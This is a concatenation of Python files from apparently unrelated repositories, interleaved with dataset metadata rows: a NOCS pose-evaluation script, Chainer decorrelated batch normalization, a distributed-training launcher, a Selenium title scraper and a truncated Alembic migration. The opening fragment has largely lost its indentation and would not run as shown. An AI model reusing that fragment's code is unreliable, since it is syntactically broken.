image_cloud = image_cloud[nocs_mask_cloud == 1.0, :]
colors = image_cloud
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(nocs_cloud)
pcd.colors = o3d.utility.Vector3dVector(colors)
mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(
size=1.0, origin=[0, 0, 0])
return pcd
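def _example_rotation_angle_error():
    # A minimal sketch of the angular-error metric used in __main__ below:
    # rotate a fixed unit vector by the GT and predicted rotations and measure
    # the angle between the results; identical rotations give ~0 degrees.
    v = np.ones((3, 1)) / np.linalg.norm(np.ones((3, 1)))
    gt_rot = pred_rot = np.eye(3)
    cos_angle = float((gt_rot @ v).T @ (pred_rot @ v))
    assert np.degrees(np.arccos(np.clip(cos_angle, -1.0, 1.0))) < 1e-3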
if __name__ == "__main__":
# Ground Truth NOCS files
# Cars
gt_nocs = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_NOXRayTL_00.png"))
gt_depth = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_Depth_00.exr"))
gt_color = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_Color_00.png"))
gt_mask = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_Mask_00.png"))
gt_pose = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_CameraPose.json"))
pred_nocs = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_nocs01.png"))
pred_depth = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_depth.tiff"))
pred_color = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_image.jpg"))
pred_mask = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_mask.jpg"))
pred_ply = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_point_cloud.ply"))
coss = []
# Camera Matrix
K = camera_matrix(888.88, 1000.0, 320, 240)
for i in tqdm(range(len(gt_nocs))):
# Read the color image
image_view = cv2.imread(gt_color[i])
image_view = cv2.cvtColor(image_view, cv2.COLOR_BGR2RGB) / 255.0
image = cv2.resize(image_view, (640, 480))
# Read the depth image
depth = imageio.imread(gt_depth[i])[:, :, 0]
# Read the nocs image
nocs = read_image(gt_nocs[i])
# # Read the pose
# pose = read_json_file(gt_pose[i])
# print("Pose", pose)
# pose = torch.from_numpy(pose_dict_to_numpy(pose))
# print("Pose", pose)
# # pose = pose_2_matrix(pose)
# rot = quat2mat(pose[3],pose[4],pose[5],pose[6])
# print("Rot", rot)
# Get the mask
mask = generate_mask_NOCS(nocs)
# Get the depth point cloud
depth_point_cloud, depth_pcd = save_point_cloud(K, image, mask, depth, num=0, output_directory='./',depth_tiff=None)
depth_points = np.asarray(depth_pcd.points)
depth_points = depth_points - np.mean(depth_points, axis=0)
depth_pcd.points = o3d.utility.Vector3dVector(depth_points)
# Get the nocs point cloud
nocs_pcd = visualize_nocs_map(nocs, nocs, mask=mask)
nocs_points = np.asarray(nocs_pcd.points) - 0.5
nocs_pcd.points = o3d.utility.Vector3dVector(nocs_points)
# Estimate Umeyama Alignment
Scales, Rotation, Translation, OutTransform = estimateSimilarityUmeyama(nocs_points.T, depth_points.T)
# ICP Alignment
reg_p2p = o3d.registration.registration_icp(
depth_pcd, nocs_pcd, 0.2, OutTransform,
o3d.registration.TransformationEstimationPointToPoint())
# draw_registration_result(depth_pcd, nocs_pcd, reg_p2p.transformation)
# print("GT: ", reg_p2p.transformation)
gt_transform = reg_p2p.transformation
        ###########################################################################################################
# Read the color image
image_view = cv2.imread(pred_color[i])
image_view = cv2.cvtColor(image_view, cv2.COLOR_BGR2RGB) / 255.0
image = cv2.resize(image_view, (640, 480))
# Read the depth image
depth = imageio.imread(pred_depth[i])#[:, :, 0]
# Read the nocs image
nocs = read_image(pred_nocs[i])
# Get the mask
mask = generate_mask_NOCS(nocs)
# Get the nocs point cloud
nocs_pcd = visualize_nocs_map(nocs, nocs, mask=mask)
nocs_points = np.asarray(nocs_pcd.points) - 0.5
# Get the depth point cloud
# depth_point_cloud, depth_pcd = save_point_cloud(K, image, mask, depth, num=0, output_directory='./',depth_tiff=1)
depth_pcd_file = pred_ply[i]
depth_pcd = o3d.io.read_point_cloud(depth_pcd_file)
depth_points = np.asarray(depth_pcd.points)
depth_points = depth_points - np.mean(depth_points, axis=0)
m_dim = len(nocs_points)
if len(depth_points) < m_dim:
m_dim = len(depth_points)
nocs_points = nocs_points[:m_dim, :]
depth_points = depth_points[:m_dim, :]
nocs_pcd.points = o3d.utility.Vector3dVector(nocs_points)
depth_pcd.points = o3d.utility.Vector3dVector(depth_points)
# Estimate Umeyama Alignment
Scales, Rotation, Translation, OutTransform = estimateSimilarityUmeyama(nocs_points.T, depth_points.T)
depth_pcd.points = o3d.utility.Vector3dVector(depth_points)
# draw_registration_result(depth_pcd, nocs_pcd, OutTransform)
# ICP Alignment
reg_p2p = o3d.registration.registration_icp(
depth_pcd, nocs_pcd, 0.2, OutTransform,
o3d.registration.TransformationEstimationPointToPoint())
pred_transform = reg_p2p.transformation
# draw_registration_result(depth_pcd, nocs_pcd, reg_p2p.transformation)
unit_vec = np.ones((3,1))
unit_vec /= np.linalg.norm(unit_vec)
print("Unit Vec", unit_vec)
gt_rot = gt_transform[:3,:3]
pred_rot = pred_transform[:3,:3]
print(gt_rot)
print(pred_rot)
gt_vec = np.squeeze((gt_rot @ unit_vec).T)
pred_vec = np.squeeze((pred_rot @ unit_vec).T)
print(f"gt_vec {gt_vec}")
print(f"pred_vec {pred_vec}")
d_prod = np.dot(gt_vec, pred_vec) / (np.linalg.norm(gt_vec) * np.linalg.norm(pred_vec))
        angle_deg = np.degrees(np.arccos(d_prod))
        coss.append(angle_deg)
        print("Angle (deg):", angle_deg)
        # progressive summary, refreshed every iteration
        fig = plt.figure(constrained_layout=True, figsize=(16, 8))
        gs = GridSpec(1, 1, figure=fig)
        ax2 = fig.add_subplot(gs[0, 0])
        ax2.hist(coss, 20, density=False, histtype='stepfilled', facecolor='orange', alpha=0.75)
        ax2.set_title("mAP")
        ax2.set_xlabel("Degree")
        ax2.set_ylabel("Frequency")
        plt.savefig("mAP Cars.png")
        plt.close(fig)  # avoid accumulating open figures across iterations
        coss_temp = np.array(coss)
        print("Mean:", np.mean(coss_temp, axis=0))
        print("StD:", np.std(coss_temp, axis=0))
    # final summary over all samples
    coss = np.array(coss)
    print("Mean:", np.mean(coss, axis=0))
    print("StD:", np.std(coss, axis=0))
    fig = plt.figure(constrained_layout=True, figsize=(16, 8))
    gs = GridSpec(1, 1, figure=fig)
    ax2 = fig.add_subplot(gs[0, 0])
    ax2.hist(coss, 20, density=False, histtype='stepfilled', facecolor='orange', alpha=0.75)
    ax2.set_title("mAP")
    ax2.set_xlabel("Degree")
    ax2.set_ylabel("Frequency")
    plt.savefig("mAP Cars.png")
| 32.097938 | 165 | 0.599004 | 1,707 | 12,454 | 4.187463 | 0.175747 | 0.018607 | 0.019586 | 0.029379 | 0.467403 | 0.451875 | 0.433548 | 0.390459 | 0.340235 | 0.325126 | 0 | 0.04789 | 0.252208 | 12,454 | 387 | 166 | 32.180879 | 0.719639 | 0.126626 | 0 | 0.202586 | 0 | 0 | 0.085179 | 0.059078 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043103 | false | 0 | 0.086207 | 0 | 0.163793 | 0.043103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e10b13128ce93e6e6559d8e9d45993251f9fca | 10,440 | py | Python | chainer/functions/normalization/decorrelated_batch_normalization.py | zaltoprofen/chainer | 3b03f9afc80fd67f65d5e0395ef199e9506b6ee1 | [
"MIT"
] | 2 | 2019-08-12T21:48:04.000Z | 2020-08-27T18:04:20.000Z | chainer/functions/normalization/decorrelated_batch_normalization.py | zaltoprofen/chainer | 3b03f9afc80fd67f65d5e0395ef199e9506b6ee1 | [
"MIT"
] | null | null | null | chainer/functions/normalization/decorrelated_batch_normalization.py | zaltoprofen/chainer | 3b03f9afc80fd67f65d5e0395ef199e9506b6ee1 | [
"MIT"
] | 2 | 2019-07-16T00:24:47.000Z | 2021-02-26T10:27:27.000Z | from chainer import backend
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
def _calc_axis_and_m(x_shape, batch_size, groups):
m = batch_size * groups
spatial_ndim = len(x_shape) - 2
spatial_axis = tuple(range(2, 2 + spatial_ndim))
for i in spatial_axis:
m *= x_shape[i]
return spatial_axis, m
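def _example_calc_axis_and_m():
    # A minimal sketch: for an NCHW input of shape (8, 32, 4, 4) whitened in
    # 2 groups, statistics are computed over m = 8 * 2 * 4 * 4 = 256 samples
    # along the spatial axes (2, 3).
    spatial_axis, m = _calc_axis_and_m((8, 32, 4, 4), batch_size=8, groups=2)
    assert spatial_axis == (2, 3) and m == 256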
class DecorrelatedBatchNormalization(function_node.FunctionNode):
def __init__(self, groups=16, eps=2e-5, mean=None, projection=None,
decay=0.9):
self.groups = groups
self.running_mean = mean
self.running_projection = projection
self.eps = eps
self.decay = decay
self.axis = None
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.shape[1] % self.groups == 0,
)
type_check.expect(
x_type.ndim >= 2,
)
def forward(self, inputs):
self.retain_inputs(())
x = inputs[0]
xp = backend.get_array_module(x)
x_shape = x.shape
b, c = x_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(x_shape, b, g)
if g > 1:
x = x.reshape((b * g, C) + x.shape[2:])
x_hat = x.transpose((1, 0) + spatial_axis).reshape(C, -1)
mean = x_hat.mean(axis=1)
x_hat = x_hat - mean[:, None]
self.eps = x.dtype.type(self.eps)
eps_matrix = self.eps * xp.eye(C, dtype=x.dtype)
cov = x_hat.dot(x_hat.T) / x.dtype.type(m) + eps_matrix
self.eigvals, self.eigvectors = xp.linalg.eigh(cov)
U = xp.diag(self.eigvals ** -0.5).dot(self.eigvectors.T)
self.y_hat_pca = U.dot(x_hat) # PCA whitening
y_hat = self.eigvectors.dot(self.y_hat_pca) # ZCA whitening
y = y_hat.reshape((C, b * g,) + x.shape[2:]).transpose(
(1, 0) + spatial_axis)
if self.groups > 1:
y = y.reshape((-1, c) + x.shape[2:])
# Update running statistics
if self.running_mean is not None:
self.running_mean *= self.decay
self.running_mean += (1 - self.decay) * mean
if self.running_projection is not None:
adjust = m / max(m - 1., 1.) # unbiased estimation
self.running_projection *= self.decay
projection = self.eigvectors.dot(U)
self.running_projection += (1 - self.decay) * adjust * projection
return y,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
f = DecorrelatedBatchNormalizationGrad(
self.groups, self.eigvals, self.eigvectors, self.y_hat_pca)
return f.apply((gy,))
class DecorrelatedBatchNormalizationGrad(function_node.FunctionNode):
def __init__(self, groups, eigvals, eigvectors, y_hat_pca):
self.groups = groups
self.eigvals = eigvals
self.eigvectors = eigvectors
self.y_hat_pca = y_hat_pca
def forward(self, inputs):
self.retain_inputs(())
gy = inputs[0]
xp = backend.get_array_module(gy)
gy_shape = gy.shape
b, c = gy_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(gy_shape, b, g)
if g > 1:
gy = gy.reshape((b * g, C) + gy.shape[2:])
gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(C, -1)
eigvectors = self.eigvectors
eigvals = self.eigvals
y_hat_pca = self.y_hat_pca
gy_hat_pca = eigvectors.T.dot(gy_hat)
f = gy_hat_pca.mean(axis=1)
K = eigvals[:, None] - eigvals[None, :]
valid = K != 0
K[valid] = 1 / K[valid]
xp.fill_diagonal(K, 0)
V = xp.diag(eigvals)
V_sqrt = xp.diag(eigvals ** 0.5)
V_invsqrt = xp.diag(eigvals ** -0.5)
F_c = gy_hat_pca.dot(y_hat_pca.T) / gy.dtype.type(m)
M = xp.diag(xp.diag(F_c))
mat = K.T * (V.dot(F_c.T) + V_sqrt.dot(F_c).dot(V_sqrt))
S = mat + mat.T
R = gy_hat_pca - f[:, None] + (S - M).T.dot(y_hat_pca)
gx_hat = R.T.dot(V_invsqrt).dot(eigvectors.T).T
gx = gx_hat.reshape((C, b * g,) + gy.shape[2:]).transpose(
(1, 0) + spatial_axis)
if g > 1:
gx = gx.reshape((-1, c, ) + gy.shape[2:])
self.retain_outputs(())
return gx,
def backward(self, inputs, grad_outputs):
# TODO(crcrpar): Implement this.
raise NotImplementedError('Double backward is not implemented for'
' decorrelated batch normalization.')
class FixedDecorrelatedBatchNormalization(function_node.FunctionNode):
def __init__(self, groups):
self.groups = groups
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, mean_type, var_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
mean_type.dtype == x_type.dtype,
var_type.dtype == x_type.dtype,
)
type_check.expect(
x_type.ndim >= 2,
)
def forward(self, inputs):
self.retain_inputs((0, 1, 2))
x, mean, projection = inputs
x_shape = x.shape
b, c = x_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(x_shape, b, g)
if g > 1:
x = x.reshape((b * g, C) + x.shape[2:])
x_hat = x.transpose((1, 0) + spatial_axis).reshape(C, -1)
y_hat = projection.dot(x_hat - mean[:, None])
y = y_hat.reshape((C, b * g) + x.shape[2:]).transpose(
(1, 0) + spatial_axis)
if g > 1:
y = y.reshape((-1, c) + x.shape[2:])
return y,
def backward(self, indexes, grad_outputs):
x, mean, projection = self.get_retained_inputs()
gy, = grad_outputs
f = FixedDecorrelatedBatchNormalizationGrad(self.groups)
return f.apply((x, mean, projection, gy))
class FixedDecorrelatedBatchNormalizationGrad(function_node.FunctionNode):
def __init__(self, groups):
self.groups = groups
def forward(self, inputs):
self.retain_inputs(())
x, mean, projection, gy = inputs
gy_shape = gy.shape
b, c = gy_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(gy_shape, b, g)
if g > 1:
gy = gy.reshape((b * g, C) + gy.shape[2:])
x = x.reshape((b * g, C) + x.shape[2:])
x_hat = x.transpose((1, 0) + spatial_axis).reshape(C, -1)
gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(C, -1)
gy_hat_pca = projection.T.dot(gy_hat)
gx = gy_hat_pca.reshape(
(C, b * g) + gy.shape[2:]).transpose((1, 0) + spatial_axis)
if g > 1:
gx = gx.reshape((-1, c) + gy.shape[2:])
        rhs = x_hat - mean[Ellipsis, None]
        # shape-consistent gradients for y_hat = projection.dot(x_hat - mean):
        # dL/dprojection = gy_hat (x_hat - mean)^T, shape (C, C)
        gprojection = gy_hat.dot(rhs.T)
        # dL/dmean = -projection^T gy_hat summed over samples, shape (C,)
        gmean = -gy_hat_pca.sum(axis=1)
self.retain_outputs(())
return gx, gmean, gprojection
def backward(self, inputs, grad_outputs):
# TODO(crcrpar): Implement this.
raise NotImplementedError('Double backward is not implemented for'
' fixed decorrelated batch normalization.')
def decorrelated_batch_normalization(x, **kwargs):
"""decorrelated_batch_normalization(x, *, groups=16, eps=2e-5, \
running_mean=None, running_projection=None, decay=0.9)
Decorrelated batch normalization function.
It takes the input variable ``x`` and normalizes it using
batch statistics to make the output zero-mean and decorrelated.
Args:
x (:class:`~chainer.Variable`): Input variable.
groups (int): Number of groups to use for group whitening.
eps (float): Epsilon value for numerical stability.
running_mean (:ref:`ndarray`): Expected value of the mean. This is a
running average of the mean over several mini-batches using
the decay parameter. If ``None``, the expected mean is initialized
to zero.
        running_projection (:ref:`ndarray`):
            Expected value of the projection matrix. This is a
            running average of the projection over several mini-batches using
            the decay parameter. If ``None``, the expected projection is
            initialized to the identity matrix.
decay (float): Decay rate of moving average. It is used during
training.
Returns:
~chainer.Variable: The output variable which has the same shape as
:math:`x`.
See: `Decorrelated Batch Normalization <https://arxiv.org/abs/1804.08450>`_
.. seealso:: :class:`~chainer.links.DecorrelatedBatchNormalization`
"""
groups, eps, running_mean, running_projection, decay = \
argument.parse_kwargs(
kwargs, ('groups', 16), ('eps', 2e-5), ('running_mean', None),
('running_projection', None), ('decay', 0.9))
f = DecorrelatedBatchNormalization(
groups, eps, running_mean, running_projection, decay)
return f.apply((x,))[0]
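def _example_decorrelated_batch_normalization():
    # A minimal usage sketch, assuming a plain float32 NumPy batch is an
    # acceptable input (FunctionNode.apply wraps raw arrays): whiten a small
    # 2-D batch in two channel groups.
    import numpy
    x = numpy.random.randn(16, 8).astype(numpy.float32)
    y = decorrelated_batch_normalization(x, groups=2)
    assert y.shape == (16, 8)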
def fixed_decorrelated_batch_normalization(x, mean, projection, groups=16):
"""Decorrelated batch normalization function with fixed statistics.
This is a variant of decorrelated batch normalization, where the mean and
projection statistics are given by the caller as fixed variables. This is
used in testing mode of the decorrelated batch normalization layer, where
batch statistics cannot be used for prediction consistency.
Args:
x (:class:`~chainer.Variable`): Input variable.
mean (:class:`~chainer.Variable` or :ref:`ndarray`):
Shifting parameter of input.
projection (:class:`~chainer.Variable` or :ref:`ndarray`):
Projection matrix for decorrelation of input.
groups (int): Number of groups to use for group whitening.
Returns:
~chainer.Variable: The output variable which has the same shape as
:math:`x`.
.. seealso::
:func:`~chainer.functions.decorrelated_batch_normalization`,
:class:`~chainer.links.DecorrelatedBatchNormalization`
"""
f = FixedDecorrelatedBatchNormalization(groups)
return f.apply((x, mean, projection))[0]
| 34.569536 | 79 | 0.597126 | 1,394 | 10,440 | 4.314204 | 0.147059 | 0.017958 | 0.054872 | 0.026937 | 0.483538 | 0.450449 | 0.42717 | 0.365314 | 0.312271 | 0.306119 | 0 | 0.015259 | 0.284387 | 10,440 | 301 | 80 | 34.684385 | 0.78972 | 0.225287 | 0 | 0.405263 | 0 | 0 | 0.024816 | 0 | 0 | 0 | 0 | 0.003322 | 0 | 1 | 0.089474 | false | 0 | 0.021053 | 0 | 0.178947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e51e1c2ad25822aeffab799695aee3ded4fa23 | 5,857 | py | Python | ml/app.py | necla-ml/ml | 7ebd29382326e3958297607da7182c211865e7ff | [
"BSD-3-Clause"
] | 1 | 2022-02-21T21:06:29.000Z | 2022-02-21T21:06:29.000Z | ml/app.py | necla-ml/ml | 7ebd29382326e3958297607da7182c211865e7ff | [
"BSD-3-Clause"
] | null | null | null | ml/app.py | necla-ml/ml | 7ebd29382326e3958297607da7182c211865e7ff | [
"BSD-3-Clause"
] | null | null | null | import os, sys
from pathlib import Path
import ml
from ml import (
cuda,
distributed as dist,
multiprocessing as mp,
random,
utils,
logging,)
def init_cuda(cfg):
if cfg.no_gpu:
# No use of GPU
cfg.gpu = []
os.environ['CUDA_VISIBLE_DEVICES'] = 'NoDevFiles'
else:
if cfg.gpu is None:
# Set CUDA Visible GPUs if any
if 'CUDA_VISIBLE_DEVICES' in os.environ and os.environ['CUDA_VISIBLE_DEVICES'] != 'NoDevFiles':
cfg.gpu = sorted(map(int, os.environ['CUDA_VISIBLE_DEVICES'].split(',')))
else:
cfg.gpu = list(range(cuda.device_count()))
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(sorted(map(str, cfg.gpu)))
def init(cfg):
init_cuda(cfg)
random.seed(cfg.seed, deterministic=cfg.deterministic)
if (cfg.logging or cfg.daemon) and cfg.logfile is None:
from __main__ import __file__ as script
cfg.logging = True
name = Path(script).stem
if cfg.rank < 0:
cfg.logfile = f"{name}-{os.getpid()}.log"
else:
cfg.logfile = f"{name}-{os.getpid()}_{cfg.rank}.log"
if cfg.logfile:
logging.info(f"Logging to {cfg.logfile}")
logging.basicConfig(filename=cfg.logfile, rank=cfg.rank, world_size=cfg.world_size)
else:
logging.basicConfig(stream=sys.stdout, rank=cfg.rank, world_size=cfg.world_size)
if cfg.dist:
if cfg.world_size > 1:
dist.init_process_group(init_method=cfg.dist_url, backend=cfg.dist_backend, rank=cfg.rank, world_size=cfg.world_size)
logging.info(f"[{cfg.rank}/{cfg.world_size}] '{dist.hostname()}' distributed with {cfg.dist_backend} using {cfg.dist_url}")
for key in ['MASTER_ADDR', 'MASTER_PORT', 'WORLD_SIZE', 'CUDA_VISIBLE_DEVICES']:
if key in os.environ:
logging.info(f"[{cfg.rank}/{cfg.world_size}] {key}: {os.environ[key]}")
else:
logging.info(f"HOST: {dist.hostname()} w/o distributed communication")
def exec(main, cfg, *args, **kwargs):
if cfg.daemon:
if sys.stdin and sys.__stdin__ and sys.__stdin__.closed:
sys.__stdin__ = sys.stdin
from daemon import daemon
with daemon.DaemonContext(umask=0o022,
chroot_directory=None,
working_directory=os.getcwd(),
stdout=sys.stdout,
stderr=sys.stderr,
) as ctx:
init(cfg)
with open(cfg.logfile, 'a') as log:
# XXX redirect stdout in case of existing print()
daemon.redirect_stream(ctx.stdout, log)
daemon.redirect_stream(ctx.stderr, log)
main(cfg, *args, **kwargs)
else:
init(cfg)
main(cfg, *args, **kwargs)
def launch(rank, main, cfg, args, kwargs):
# New GPU worker proc
assert rank >= 0
assert cfg.world_size > 0
assert cfg.dist
cfg.rank = rank
if cfg.dist == 'torch':
# NOTE launched with init_cuda()
if cfg.gpu:
# single node rank -> local GPU index
cfg.gpu = [cfg.gpu[rank]]
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}) {utils.get_num_threads()} cores) w/ CUDA_VISIBLE_DEVICES={os.environ['CUDA_VISIBLE_DEVICES']}")
else:
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}) {utils.get_num_threads()} cores)")
elif cfg.dist == 'slurm':
# NOTE launched w/o CUDA initialization yet
assert cfg.gpu is None
assert 'CUDA_VISIBLE_DEVICES' in os.environ
if os.environ['CUDA_VISIBLE_DEVICES'] == 'NoDevFiles':
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}/{dist.slurm_master()} w/ {utils.get_num_threads()} cores)")
else:
# global rank -> local visible GPU(s) instead of absolute SLURM_JOB_GPUS
devices = list(map(int, os.environ['CUDA_VISIBLE_DEVICES'].split(',')))
cfg.gpu = [devices[cfg.rank % cfg.slurm_ntasks_per_node]]
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}/{dist.slurm_master()} w/ {utils.get_num_threads()} cores) CUDA_VISIBLE_DEVICES={os.environ['CUDA_VISIBLE_DEVICES']}")
exec(main, cfg, *args, **kwargs)
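def _example_run_local():
    # A minimal usage sketch for run() below, assuming `cfg` may be any
    # namespace exposing the attributes read by init()/init_cuda(): runs a
    # trivial main locally, without any distributed backend.
    from types import SimpleNamespace
    cfg = SimpleNamespace(no_gpu=True, gpu=None, seed=0, deterministic=False,
                          logging=False, daemon=False, logfile=None,
                          rank=-1, world_size=-1, dist=None)
    run(lambda c: logging.info("hello from main"), cfg)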
def run(main, cfg, *args, **kwargs):
if cfg.dist:
if cfg.rank < 0:
# Launch distributed workers to assign ranks
if cfg.dist == "torch":
# spawn one proc per GPU over available locally
assert cfg.world_size < 0, f"PyTorch distributed world is subject to available local GPUs"
init_cuda(cfg)
cfg.world_size = len(cfg.gpu)
os.environ['MASTER_ADDR'] = dist.hostname()
os.environ['MASTER_PORT'] = str(cfg.dist_port)
os.environ['WORLD_SIZE'] = str(cfg.world_size)
return mp.start_processes(launch, args=(main, cfg, args, kwargs), nprocs=cfg.world_size, daemon=False, join=True, start_method='fork')
elif cfg.dist == "slurm":
if 'SLURM_PROCID' not in os.environ:
# first time to sbatch with specified resource allocation
return dist.slurm_sbatch(cfg)
else:
# launched by SLURM on some (GPU) node
dist.slurm_init(cfg, *args, **kwargs)
return launch(cfg.rank, main, cfg, args, kwargs)
else:
raise ValueError(f"Unsupported distributed mode: {cfg.dist}")
else:
assert False, f"Rank must not be set manually"
else:
# Local worker with cfg.gpu
exec(main, cfg, *args, **kwargs) | 44.371212 | 188 | 0.583575 | 742 | 5,857 | 4.459569 | 0.233154 | 0.054397 | 0.054397 | 0.046238 | 0.3424 | 0.265639 | 0.183741 | 0.183741 | 0.085827 | 0.085827 | 0 | 0.002414 | 0.292641 | 5,857 | 132 | 189 | 44.371212 | 0.796283 | 0.085026 | 0 | 0.218182 | 0 | 0.036364 | 0.227086 | 0.102694 | 0 | 0 | 0 | 0 | 0.063636 | 1 | 0.045455 | false | 0 | 0.063636 | 0 | 0.136364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e59a34da2419eebef779ae17ec337eb9356b63 | 2,497 | py | Python | sopel-homedirectory/modules/lib/gettitle.py | kunwon1/subtitle-selenium | 9af8c08d5f30cf0734a65cad79a6ac98a2647124 | [
"MIT"
] | null | null | null | sopel-homedirectory/modules/lib/gettitle.py | kunwon1/subtitle-selenium | 9af8c08d5f30cf0734a65cad79a6ac98a2647124 | [
"MIT"
] | null | null | null | sopel-homedirectory/modules/lib/gettitle.py | kunwon1/subtitle-selenium | 9af8c08d5f30cf0734a65cad79a6ac98a2647124 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pyvirtualdisplay import Display
import urllib3.exceptions
import traceback
import string
import time
import re
printable = set(string.printable)
class Titler:
def __init__(self):
options = webdriver.ChromeOptions()
self.display = Display(visible=0, size=(1920, 1080))
self.display.start()
        options.add_argument('--window-size=1200,600')  # Chrome expects "width,height"
self.driver = webdriver.Chrome(options = options)
self.driver.implicitly_wait(5)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.driver:
self.driver.quit()
if self.display:
self.display.stop()
def GetTitle(self, url):
url = ''.join(filter(lambda x: x in printable, url))
title = False
try:
self.driver.get(url)
# WebDriverWait(self.driver, 10).until(
# lambda driver: driver.execute_script('return document.readyState') == 'complete'
# )
time.sleep(1)
if 'twitter.com' in url:
time.sleep(3)
title = WebDriverWait(self.driver, 10).until(
TitleContainsText()
)
except urllib3.exceptions.HTTPError:
pass
except Exception as exc:
print(traceback.format_exc())
print(exc)
return title
class TitleContainsText(object):
def __call__(self, driver):
title = driver.title
if re.match(r'[\S]+', title) is not None:
return title
else:
return False
if __name__ == '__main__':
with Titler() as titler:
t = titler.GetTitle('https://google.com')
print(t)
t = titler.GetTitle('http://bcfhkdlnmvrstwzx.neverssl.com/online')
print(t)
t = titler.GetTitle('https://www.nytimes.com/2019/10/31/us/keystone-pipeline-leak.html')
print(t)
t = titler.GetTitle('https://www.washingtonpost.com/world/asia_pacific/chinese-official-to-us-after-limits-put-on-its-journalists-lets-play/2020/03/03/fed674d8-5d34-11ea-ac50-18701e14e06d_story.html')
print(t)
t = titler.GetTitle('https://twitter.com/TessaDuvall/status/1234960398631219200')
print(t)
print('OK')
| 30.82716 | 208 | 0.62515 | 289 | 2,497 | 5.287197 | 0.480969 | 0.052356 | 0.049084 | 0.052356 | 0.11322 | 0.060209 | 0.060209 | 0 | 0 | 0 | 0 | 0.043549 | 0.264317 | 2,497 | 80 | 209 | 31.2125 | 0.788242 | 0.060072 | 0 | 0.111111 | 0 | 0.031746 | 0.174603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079365 | false | 0.015873 | 0.15873 | 0.015873 | 0.333333 | 0.15873 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e644d9272bdc05c07609d43e1cf04ff2a64a5c | 769 | py | Python | carpyncho/migrations/versions/19e8e023f5fb_remove_enum_from_tile.py | toros-astro/carpyncho3 | 27b00e7539e081c563f1a09c70fb255ac5e71583 | [
"BSD-3-Clause"
] | 1 | 2016-02-16T11:10:52.000Z | 2016-02-16T11:10:52.000Z | carpyncho/migrations/versions/19e8e023f5fb_remove_enum_from_tile.py | toros-astro/carpyncho3 | 27b00e7539e081c563f1a09c70fb255ac5e71583 | [
"BSD-3-Clause"
] | null | null | null | carpyncho/migrations/versions/19e8e023f5fb_remove_enum_from_tile.py | toros-astro/carpyncho3 | 27b00e7539e081c563f1a09c70fb255ac5e71583 | [
"BSD-3-Clause"
] | null | null | null | """remove enum from tile
Revision ID: 19e8e023f5fb
Revises: cf2e08638e84
Create Date: 2018-08-23 12:43:31.403270
"""
# revision identifiers, used by Alembic.
revision = '19e8e023f5fb'
down_revision = 'cf2e08638e84'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('Tile', 'status')
op.add_column('Tile', sa.Column('status', sa.String(255), nullable=False, default="raw"))
# ### end Alembic commands ###
def downgrade():
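    # NOTE: the original enum definition of 'status' is not recorded in this
    # migration, so the downgrade below re-creates the column as a plain
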